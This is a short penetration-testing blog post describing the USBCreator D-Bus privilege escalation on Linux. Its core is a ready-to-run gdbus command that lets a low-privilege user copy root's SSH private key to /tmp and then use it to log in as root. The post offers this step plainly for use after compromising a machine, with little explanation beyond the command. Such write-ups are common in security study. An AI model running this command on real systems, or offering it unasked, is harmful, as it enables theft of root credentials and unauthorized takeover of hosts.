USBCreator D-Bus Privilege Escalation

July 16, 2021 rioasmara Penentration Test Leave a comment

Hi ..

Another post-exploitation that is very easy to be executed is using Linux USBCreator. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root – without supplying a password

When I do the post-exploitation enumeration with linpeas.sh, I found that this host is vulnerable to the USBCreator D-Bus privilege escalation as shown below

So, when you have compromise the local machine with lower user privilege then basically you can run command below

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

With the above gdbus command we can copy the ssh private key from /root/.sshd/ to be copied to /tmp which later we can use the private key to do the SSH

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

Share this:

Like this:

Related

Leave a Reply Cancel reply